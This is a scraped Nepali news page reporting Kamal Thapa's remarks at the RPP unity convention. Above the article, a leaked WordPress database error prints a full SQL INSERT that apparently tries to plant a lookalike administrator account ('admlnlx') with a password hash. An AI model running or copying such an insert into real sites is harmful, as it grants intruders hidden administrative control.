WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2T..OtPA1mLmVi1Pq6v21v8MIQfv81', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 17:03:02', '', 'admlnlx', 'admlnlx')

गणतन्त्रवादीहरु राजसंस्था संग नझस्क, प्रजातन्त्रवादीहरु राजसंस्था पक्षधरहरु संग नचस्क : कमल थापा – Gaule Khabar

गणतन्त्रवादीहरु राजसंस्था संग नझस्क, प्रजातन्त्रवादीहरु राजसंस्था पक्षधरहरु संग नचस्क : कमल थापा

गणतन्त्रवादीहरु राजसंस्था संग नझस्क, प्रजातन्त्रवादीहरु राजसंस्था पक्षधरहरु संग नचस्क : कमल थापा

सुमित आचार्य

काठमाडौं, फागुन ६–

राप्रपा अध्यक्ष कमल थापाले देश गम्भिर संकटको भुमरिमा परेको बताउनु भएको छ ।

आजदेखि सुरुभएको राष्ट्रीय प्रजातन्त्र पाट्रीको प्रथम एकता महाधिवेशनमा बोल्दै अध्यक्ष थापाले संविधान कार्यन्वयनप्रति शंका व्यक्त गर्दै चक्रव्युबाट देशलाइ बचाउनलाइनै राप्रपाको एकिकरण भएको बताउन भयो । नेता थापाले प्रचण्डलाइ विद्रोहको कमान्डरको संज्ञा दिदै आफुहरुको माग पुरा गराउन कसैले पनि जंगल जानु नपर्ने र सिमामा बसेर नाकाबन्द गर्न नहुने बताउनुभयो । उनले आफ्नो पार्टीले सबै जात र जनतालाइ सम्मान गर्ने र कुनै धर्मसंग राप्रपाको दुुश्मनि नभएको स्पष्ट गर्नुभयो ।

अहिले देशमा राजा सहितको लोकतन्त्र आवश्यक रहेको र गणतन्त्रवादीहरु राजसंस्था संग नझस्क, प्रजातन्त्रवादीहरु राजसंस्था पक्षधरहरु संग नचस्कन सुझाव पनि दिनुभयो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका